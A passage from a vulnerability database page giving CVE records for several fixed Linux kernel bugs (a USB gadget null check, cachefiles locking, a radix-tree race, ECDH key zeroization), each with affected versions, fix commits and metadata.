                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.16.80",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.4.199",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.9.199",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.152",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: core: Check for unset descriptor\n\nMake sure the descriptor has been set before looking at maxpacket.\nThis fixes a null pointer panic in this case.\n\nThis may happen if the gadget doesn\u0027t properly set up the endpoint\nfor the current speed, or the gadget descriptors are malformed and\nthe descriptor for the speed/endpoint are not found.\n\nNo current gadget driver is known to have this problem, but this\nmay cause a hard-to-find bug during development of new gadgets."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:29.741Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ba15815dd24cc5ec0d23e2170dc58c7db1e03b4a"
        },
        {
          "url": "https://git.kernel.org/stable/c/df8e734ae5e605348aa0ca2498aedb73e815f244"
        },
        {
          "url": "https://git.kernel.org/stable/c/7cc9ebcfe58be22f18056ad8bc6272d120bdcb3e"
        },
        {
          "url": "https://git.kernel.org/stable/c/50c5248b0ea8aae0529fdf28dac42a41312d3b62"
        },
        {
          "url": "https://git.kernel.org/stable/c/a0362cd6e503278add954123957fd47990e8d9bf"
        },
        {
          "url": "https://git.kernel.org/stable/c/1a9df57d57452b104c46c918569143cf21d7ebf1"
        },
        {
          "url": "https://git.kernel.org/stable/c/716cba46f73a92645cf13eded8d257ed48afc2a4"
        },
        {
          "url": "https://git.kernel.org/stable/c/973a57891608a98e894db2887f278777f564de18"
        }
      ],
      "title": "usb: gadget: core: Check for unset descriptor",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44960",
    "datePublished": "2024-09-04T18:35:58.469Z",
    "dateReserved": "2024-08-21T05:34:56.666Z",
    "dateUpdated": "2025-11-03T22:14:09.135Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42250 (GCVE-0-2024-42250)

Vulnerability from cvelistv5 – Published: 2024-08-07 15:14 – Updated: 2025-11-03 22:02

Title

cachefiles: add missing lock protection when polling

Summary

In the Linux kernel, the following vulnerability has been resolved: cachefiles: add missing lock protection when polling Add missing lock protection in poll routine when iterating xarray, otherwise: Even with RCU read lock held, only the slot of the radix tree is ensured to be pinned there, while the data structure (e.g. struct cachefiles_req) stored in the slot has no such guarantee. The poll routine will iterate the radix tree and dereference cachefiles_req accordingly. Thus RCU read lock is not adequate in this case and spinlock is needed here.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/97cfd5e20ddc2e33e…
	https://git.kernel.org/stable/c/6bb6bd3dd6f382dfd…
	https://git.kernel.org/stable/c/8eadcab7f3dd809ed…
	https://git.kernel.org/stable/c/cf5bb09e742a9cf63…

Impacted products

Vendor

Product

Version

Linux

Affected: 0e19a18f998dcabe8be590e0b39660a1f230209b , < 97cfd5e20ddc2e33e16ce369626ce76c9a475fd7 (git)
Affected: 18943864342705fa18dd4e6b8d608491fec81f6e , < 6bb6bd3dd6f382dfd36220d4b210a0c77c066651 (git)
Affected: b817e22b2e91257ace32a6768c3c003faeaa1c5c , < 8eadcab7f3dd809edbe5ae20533ff843dfea3a07 (git)
Affected: b817e22b2e91257ace32a6768c3c003faeaa1c5c , < cf5bb09e742a9cf6349127e868329a8f69b7a014 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.9.10 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42250",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:13:18.948935Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:30.655Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:51.030Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/daemon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "97cfd5e20ddc2e33e16ce369626ce76c9a475fd7",
              "status": "affected",
              "version": "0e19a18f998dcabe8be590e0b39660a1f230209b",
              "versionType": "git"
            },
            {
              "lessThan": "6bb6bd3dd6f382dfd36220d4b210a0c77c066651",
              "status": "affected",
              "version": "18943864342705fa18dd4e6b8d608491fec81f6e",
              "versionType": "git"
            },
            {
              "lessThan": "8eadcab7f3dd809edbe5ae20533ff843dfea3a07",
              "status": "affected",
              "version": "b817e22b2e91257ace32a6768c3c003faeaa1c5c",
              "versionType": "git"
            },
            {
              "lessThan": "cf5bb09e742a9cf6349127e868329a8f69b7a014",
              "status": "affected",
              "version": "b817e22b2e91257ace32a6768c3c003faeaa1c5c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/daemon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncachefiles: add missing lock protection when polling\n\nAdd missing lock protection in poll routine when iterating xarray,\notherwise:\n\nEven with RCU read lock held, only the slot of the radix tree is\nensured to be pinned there, while the data structure (e.g. struct\ncachefiles_req) stored in the slot has no such guarantee.  The poll\nroutine will iterate the radix tree and dereference cachefiles_req\naccordingly.  Thus RCU read lock is not adequate in this case and\nspinlock is needed here."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:25:05.414Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/97cfd5e20ddc2e33e16ce369626ce76c9a475fd7"
        },
        {
          "url": "https://git.kernel.org/stable/c/6bb6bd3dd6f382dfd36220d4b210a0c77c066651"
        },
        {
          "url": "https://git.kernel.org/stable/c/8eadcab7f3dd809edbe5ae20533ff843dfea3a07"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf5bb09e742a9cf6349127e868329a8f69b7a014"
        }
      ],
      "title": "cachefiles: add missing lock protection when polling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42250",
    "datePublished": "2024-08-07T15:14:33.997Z",
    "dateReserved": "2024-07-30T07:40:12.256Z",
    "dateUpdated": "2025-11-03T22:02:51.030Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-47668 (GCVE-0-2024-47668)

Vulnerability from cvelistv5 – Published: 2024-10-09 14:14 – Updated: 2026-01-05 10:53

Title

lib/generic-radix-tree.c: Fix rare race in __genradix_ptr_alloc()

Summary

In the Linux kernel, the following vulnerability has been resolved: lib/generic-radix-tree.c: Fix rare race in __genradix_ptr_alloc() If we need to increase the tree depth, allocate a new node, and then race with another thread that increased the tree depth before us, we'll still have a preallocated node that might be used later. If we then use that node for a new non-root node, it'll still have a pointer to the old root instead of being zeroed - fix this by zeroing it in the cmpxchg failure path.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0f27f4f445390cb7f…
	https://git.kernel.org/stable/c/99418ec776a39609f…
	https://git.kernel.org/stable/c/ad5ee9feebc2eb8cf…
	https://git.kernel.org/stable/c/ebeff038744c498a0…
	https://git.kernel.org/stable/c/d942e855324a60107…
	https://git.kernel.org/stable/c/0f078f8ca93b28a34…
	https://git.kernel.org/stable/c/b2f11c6f3e1fc6074…

Impacted products

Vendor

Product

Version

Linux

Affected: ba20ba2e3743bac786dff777954c11930256075e , < 0f27f4f445390cb7f73d4209cb2bf32834dc53da (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < 99418ec776a39609f50934720419e0b464ca2283 (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < ad5ee9feebc2eb8cfc76ed74a2d6e55343b0e169 (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < ebeff038744c498a036e7a92eb8e433ae0a386d7 (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < d942e855324a60107025c116245095632476613e (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < 0f078f8ca93b28a34e20bd050f12cd4efeee7c0f (git)
Affected: ba20ba2e3743bac786dff777954c11930256075e , < b2f11c6f3e1fc60742673b8675c95b78447f3dae (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-47668",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-10T13:21:11.227741Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-10T13:21:24.795Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:20:33.256Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "lib/generic-radix-tree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0f27f4f445390cb7f73d4209cb2bf32834dc53da",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "99418ec776a39609f50934720419e0b464ca2283",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "ad5ee9feebc2eb8cfc76ed74a2d6e55343b0e169",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "ebeff038744c498a036e7a92eb8e433ae0a386d7",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "d942e855324a60107025c116245095632476613e",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "0f078f8ca93b28a34e20bd050f12cd4efeee7c0f",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            },
            {
              "lessThan": "b2f11c6f3e1fc60742673b8675c95b78447f3dae",
              "status": "affected",
              "version": "ba20ba2e3743bac786dff777954c11930256075e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "lib/generic-radix-tree.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.110",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.51",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.10",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/generic-radix-tree.c: Fix rare race in __genradix_ptr_alloc()\n\nIf we need to increase the tree depth, allocate a new node, and then\nrace with another thread that increased the tree depth before us, we\u0027ll\nstill have a preallocated node that might be used later.\n\nIf we then use that node for a new non-root node, it\u0027ll still have a\npointer to the old root instead of being zeroed - fix this by zeroing it\nin the cmpxchg failure path."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:53:56.917Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0f27f4f445390cb7f73d4209cb2bf32834dc53da"
        },
        {
          "url": "https://git.kernel.org/stable/c/99418ec776a39609f50934720419e0b464ca2283"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad5ee9feebc2eb8cfc76ed74a2d6e55343b0e169"
        },
        {
          "url": "https://git.kernel.org/stable/c/ebeff038744c498a036e7a92eb8e433ae0a386d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/d942e855324a60107025c116245095632476613e"
        },
        {
          "url": "https://git.kernel.org/stable/c/0f078f8ca93b28a34e20bd050f12cd4efeee7c0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/b2f11c6f3e1fc60742673b8675c95b78447f3dae"
        }
      ],
      "title": "lib/generic-radix-tree.c: Fix rare race in __genradix_ptr_alloc()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-47668",
    "datePublished": "2024-10-09T14:14:00.189Z",
    "dateReserved": "2024-09-30T16:00:12.936Z",
    "dateUpdated": "2026-01-05T10:53:56.917Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42098 (GCVE-0-2024-42098)

Vulnerability from cvelistv5 – Published: 2024-07-29 17:39 – Updated: 2026-01-05 10:51

Title

crypto: ecdh - explicitly zeroize private_key

Summary

In the Linux kernel, the following vulnerability has been resolved: crypto: ecdh - explicitly zeroize private_key private_key is overwritten with the key parameter passed in by the caller (if present), or alternatively a newly generated private key. However, it is possible that the caller provides a key (or the newly generated key) which is shorter than the previous key. In that scenario, some key material from the previous key would not be overwritten. The easiest solution is to explicitly zeroize the entire private_key array first. Note that this patch slightly changes the behavior of this function: previously, if the ecc_gen_privkey failed, the old private_key would remain. Now, the private_key is always zeroized. This behavior is consistent with the case where params.key is set and ecc_is_key_valid fails.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/39173b04abda87872…
	https://git.kernel.org/stable/c/fd7ef325911eba1b7…
	https://git.kernel.org/stable/c/80575b252ab0358b7…
	https://git.kernel.org/stable/c/d96187eb8e59b572a…
	https://git.kernel.org/stable/c/73e5984e540a76a2e…

Impacted products

Vendor

Product

Version

Linux

Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 39173b04abda87872b43c331468a4a14f8f05ce8 (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < fd7ef325911eba1b7191b83cb580463242f2090d (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 80575b252ab0358b7e93895b2a510beb3cb3f975 (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < d96187eb8e59b572a8e6a68b6a9837a867ea29df (git)
Affected: 3c4b23901a0c766879dff680cd6bdab47bcdbbd2 , < 73e5984e540a76a2ee1868b91590c922da8c24c9 (git)

Linux

Affected: 4.8
Unaffected: 0 , < 4.8 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:33.618Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42098",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:15.393547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:59.924Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "crypto/ecdh.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "39173b04abda87872b43c331468a4a14f8f05ce8",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "fd7ef325911eba1b7191b83cb580463242f2090d",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "80575b252ab0358b7e93895b2a510beb3cb3f975",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "d96187eb8e59b572a8e6a68b6a9837a867ea29df",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            },
            {
              "lessThan": "73e5984e540a76a2ee1868b91590c922da8c24c9",
              "status": "affected",
              "version": "3c4b23901a0c766879dff680cd6bdab47bcdbbd2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "crypto/ecdh.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.8"
            },
            {
              "lessThan": "4.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: ecdh - explicitly zeroize private_key\n\nprivate_key is overwritten with the key parameter passed in by the\ncaller (if present), or alternatively a newly generated private key.\nHowever, it is possible that the caller provides a key (or the newly\ngenerated key) which is shorter than the previous key. In that\nscenario, some key material from the previous key would not be\noverwritten. The easiest solution is to explicitly zeroize the entire\nprivate_key array first.\n\nNote that this patch slightly changes the behavior of this function:\npreviously, if the ecc_gen_privkey failed, the old private_key would\nremain. Now, the private_key is always zeroized. This behavior is\nconsistent with the case where params.key is set and ecc_is_key_valid\nfails."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:50.674Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/39173b04abda87872b43c331468a4a14f8f05ce8"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd7ef325911eba1b7191b83cb580463242f2090d"
        },
        {
          "url": "https://git.kernel.org/stable/c/80575b252ab0358b7e93895b2a510beb3cb3f975"
        },
        {
          "url": "https://git.kernel.org/stable/c/d96187eb8e59b572a8e6a68b6a9837a867ea29df"
        },
        {
          "url": "https://git.kernel.org/stable/c/73e5984e540a76a2ee1868b91590c922da8c24c9"
        }
      ],
      "title": "crypto: ecdh - explicitly zeroize private_key",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42098",
    "datePublished": "2024-07-29T17:39:33.395Z",
    "dateReserved": "2024-07-29T15:50:41.173Z",
    "dateUpdated": "2026-01-05T10:51:50.674Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26633 (GCVE-0-2024-26633)

Vulnerability from cvelistv5 – Published: 2024-03-18 10:07 – Updated: 2025-05-04 12:54

Title

ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()

Summary

